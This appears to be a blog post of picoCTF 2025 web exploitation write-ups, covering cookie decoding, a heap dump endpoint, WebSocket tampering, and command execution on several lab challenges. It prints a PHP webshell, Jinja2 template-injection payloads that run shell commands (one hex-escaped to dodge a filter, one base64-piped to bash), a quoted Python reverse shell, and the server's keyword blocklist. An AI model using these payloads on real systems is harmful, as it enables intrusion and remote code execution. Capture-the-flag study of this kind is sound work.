PicoCTF 2025 - Web Exploitation Writeups

This post contains a collection of writeups under the Web Exploitation category for PicoCTF 2025.

picoCTF 2025 Web Exploitation Writeups Banner
picoCTF 2025 Web Exploitation Writeups Banner

This post contains a collection of writeups under the Web Exploitation category for PicoCTF 2025.

Cookie Monster Secret Recipe - 50 Points Challenge
Cookie Monster Secret Recipe - 50 Points Challenge
Cookie Monster's Secret Recipe distribution website screenshot
Cookie Monster's Secret Recipe distribution website screenshot

We are given the following hint after trying to login with admin:password , if we check for application cookies in the developer console, we can see there is a secret_recipe cookie.

Cookie Monster's Secret Recipe Cookie hint
Cookie Monster's Secret Recipe Cookie hint

The cookie value is base64 encoded, we can easily decode it using CyberChef or through javascript in the Console tab.

atob(decodeURIComponent(document.cookie.split('=')[1]))

JS to decode the base64 encoded flag cookie

Flag: picoCTF{c00k1e_m0nster_l0ves_c00kies_6C2FB7F3}

Advertisement
Advertisement

head-dump - 50 Points

head-dump - 50 Points Challenge
head-dump - 50 Points Challenge

This is a very easy challenge, all we need is to first look at all the pages, there is a documentation link which leads to /api-docs.

head-dump website screenshot
head-dump website screenshot

When we navigate to the Swagger Docs page we see a list of api endpoints we can try out.

head-dump Swagger Documentation
head-dump Swagger Documentation

The Diagnosing portion at the bottom with a /headdump method looks interesting as it seems to dump out the application memory which should include the flag if it is loaded by the express application

head-dump method to debug application memory
head-dump method to debug application memory

Afer running the method and downloading the file, the flag should be right inside, since we know the flag format, we can easily find it without sifting through entire snapshot file using the following.

grep -E "picoCTF{.*}" heapdump-1741608648895.heapsnapshot

Flag: picoCTF{Pat!3nt_15_Th3_K3y_f1179e46}

n0s4n1ty 1 - 100 points

n0s4n1ty 1 - 100 Points Challenge
n0s4n1ty 1 - 100 Points Challenge

This is honestly quite a badly named challenge. It is pretty much a classic php upload shell challenge (without any bypass required at all).

n0s4n1ty 1 - upload profile
n0s4n1ty 1 - upload profile

First we test a classic php webshell and saved it as shell.png.php which we then upload.

<? echo shell_exec($_GET['cmd'].' 2>&1'); ?>
shell.png.php successfully uploaded
shell.png.php successfully uploaded

Seems like there is no check at all on mime type or file extensions, now, we test if we have code execution by sending whoami as the cmd parameter with ?cmd=whoami

We get back www-data which means we have a working webshell. If we try to list the files with ls -lah /root, we get an error

ls: cannot open directory '/root': Permission denied

If we try to see what commands the current user can run with sudo using sudo -l

sudo -l all perms without password
sudo -l all perms without password

We can run any command without requiring password. Since we know the flag is in /root and it is probably in some text file. We can grep for all text files with

grep -rnw '/root' -e '.*' --include=*.txt
flag.txt found with our flag
flag.txt found with our flag

Flag: picoCTF{wh47_c4n_u_d0_wPHP_5f3c22c0}

Advertisement
Advertisement

SSTI1 - 100 Points

SSTI1 - 100 Points Challenge
SSTI1 - 100 Points Challenge

This is a fun one, we are given the clue from the challenge name that there is probably some SSTI or Server Side Template Injection involed. If we visit the site and enter some test text, we can see from the headers that it is a Python application.

SSTI1 - Headers showing Python application
SSTI1 - Headers showing Python application

If we use the classic {{7*7}} Python SSTI test, we get back the following indicating there is indeed confirmed SSTI

SSTI1 - {{7*7}} returns 49
SSTI1 - {{7*7}} returns 49

If we test for the config object with {{ config }}, we get the following which more or less confirms that Jinja2 is being used.

SSTI1 - {{ config }} returns config object
SSTI1 - {{ config }} returns config object

Looking at some of the template RCE methods from PayloadAllTheThings, we try the following modified SSTI to grep for files containing the known flag format picoCTF

{{ namespace.__init__.__globals__.os.popen('grep picoCTF . -rnw').read() }}

We get back the flag

SSTI1 - flag returned
SSTI1 - flag returned

Flag: picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_99fe4411}

SSTI2 - 200 Points

SSTI2 - 200 Points Challenge
SSTI2 - 200 Points Challenge

This is similar to SSTI1 with the difference being that there is a blacklist of certain characters. We can simply use a more convulated version of the SSTI from PayloadAllTheThings modified to our scenario.

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('grep picoCTF . -rnw')|attr('read')()}}

We get the flag

SSTI2 - Flag returned
SSTI2 - Flag returned

If we see the source code of app.py after , we can see the list of blacklisted strings that are removed

app.py source blacklist characters
app.py source blacklist characters

Flag: picoCTF{sst1_f1lt3r_byp4ss_96a02202}

Advertisement
Advertisement

3v@l - 200 Points

3v@l - 200 Points Challenge
3v@l - 200 Points Challenge

From the description itself, it looks like an unsafe eval challenge with some backlisting using regex.

Blacklisted items in comments
Blacklisted items in comments

From the html comments, it seems like there is keyword filtering for common keywords like os, ls and cat. However that should be a trivial bypass since we python allows string concatenation using something like 'ca'+'t' which is the same as 'cat'.

For the regex, it seems to match a ton of tricks such as using hexadecimal or other forms of encoding to bypass what seems like a file path. Noticeably, | is allowed and the keyword filtering seems to miss out something obvious, which is we can simply use base64 encoding and pipe it to bash to bypass the path regex entirely once we can execute commands.

First off, the same PayloadAllTheThings link for the Jinja2 SSTI is still useful here.
Given that ls is filtered, we will probably have issues with anything that uses __globals__ . First off we can try to modify the following into a one liner (not sure if multiline indented lines will work so its easier to err on the side of caution)

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

SSTI snippet unmodified

The above basically loops through all subclasses of the object class looking for the warning class, we then instantiate an instance of the class and can access the import functionality through _module.__builtins__ , the rest is just calling os.popen(<command to run>) and getting the output with read().

After removing the unneeded portions, using string concatination for keywords and using id for the popen function as well as list comprehension (to make it one line). We get the following

[x()._module.__builtins__['__import__']('o'+'s').popen("echo Y2F0IC9mbGFnLnR4dA== | base64 -d| bash").read() for x in ().__class__.__base__.__subclasses__() if "warning" in x.__name__][0]

Notice what we pass in to popen? That is cat /flag.txt base64 encoded. We can run the encoded command by piping it to base64 -d which decodes the command and then piping to bash which runs the cat flag command.

After running that, we get the flag.

Filter bypassed, flag obtained.
Filter bypassed, flag obtained.

Flag: picoCTF{D0nt_Use_Unsecure_f@nctionscaec21d1}

Extras

If you don't know yet. A useful trick to cat all files in the present directory along with line numbers is to use grep . -rnw which essentially outputs all lines and line numbers of files starting from the present folder recursively.

If we run ls -lah (with string concatination to bypass the ls check portion), we see

Result: total 4.0K
drwxr-xr-x 1 app  app    51 Mar  6 03:42 .
drwxr-xr-x 1 root root    6 Mar 13 10:00 ..
-rw-r--r-- 1 app  app  1.2K Mar  6 03:27 app.py
drwxr-xr-x 1 app  app    49 Mar  6 03:42 static
drwxr-xr-x 1 app  app    61 Mar  6 03:42 templates

We can cat the app.py file to see the details of the filtering which it attempts to do to prevent malicious input.

# Define blocklist keywords and regex for file paths
BLOCKLIST_KEYWORDS = ['os', 'eval', 'exec', 'bind', 'connect', 'python','python3', 'socket', 'ls', 'cat', 'shell', 'bind']
FILE_PATH_REGEX = r'0x[0-9A-Fa-f]+|\\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|\.[A-Za-z0-9]{1,3}\b|[\\\/]|\.\.'

@app.route('/execute', methods=['POST'])
def execute():
    code = request.form['code']

    # Check for blocklist keywords in submitted code
    for keyword in BLOCKLIST_KEYWORDS:
        if keyword in code:
            return render_template('error.html', keyword=keyword)

    # Check for file path using regex
    if re.search(FILE_PATH_REGEX, code):
        return render_template('error.html')

Snippet in app.py

Advertisement
Advertisement

WebSockFish - 200 Points

WebSockFish - 200 Points Challenge
WebSockFish - 200 Points Challenge

It looks like we are supposed to play a game of chess versus some chess engine / bot?

Lets' play chess?
Lets' play chess?

If we look at the inline javascript we see that websocket is used for communications with the server as follows.

Connecting to websocket server endpoint.
Connecting to websocket server endpoint.

Futher down we see the format of the messages sent via some input from stockfish.

Message format for websockets
Message format for websockets

Seems that there are 2 message types. eval [integer] and mate [integer]. If we try and play normally, we reach a point where it says "You're in deep water now!"

Are we going to lose?
Are we going to lose?

If we inspect the messages sent and received via websockets, we see that it starts with eval 0 as we make our first move and as we start to lose the integer gets bigger, perhaps the larger the number it means the higher the confidence that stockfish thinks it is winning?

We are in deep water 😦
We are in deep water 😦

At this point, I had no idea if I was supposed to beat the bot to get the flag or somehow or another. But seeing this trend, I wondered if I can trick the bot to think it is losing, if the eval integer gets higher more confident it gets, what if I make it lower and lower until it thinks it is losing?

From the console, we can establish another websocket to the server and start sending negative eval commands.

var ws_address = "ws://" + location.hostname + ":" + location.port + "/ws/";
let ws2 = new WebSocket(ws_address);

ws2.send("eval -1") // works, lets carry on
ws2.send("eval -1337")
ws2.send("eval -13337")
ws2.send("eval -133337")

Sending negative integers with the eval command

Now we get the message back with the flag. We unknowingly solved the question!

eval messages sent and flag returned.
eval messages sent and flag returned.

Flag: picoCTF{c1i3nt_s1d3_w3b_s0ck3t5_0d3d41e1}

The end?

Unfortunately, those were the web challenges I managed to solve during the little time I had as I was busy with many other obligations. Perhaps when I have time to try the other challenges I will update this post!

Thanks for reading until here! All the best in your CTFs! 😄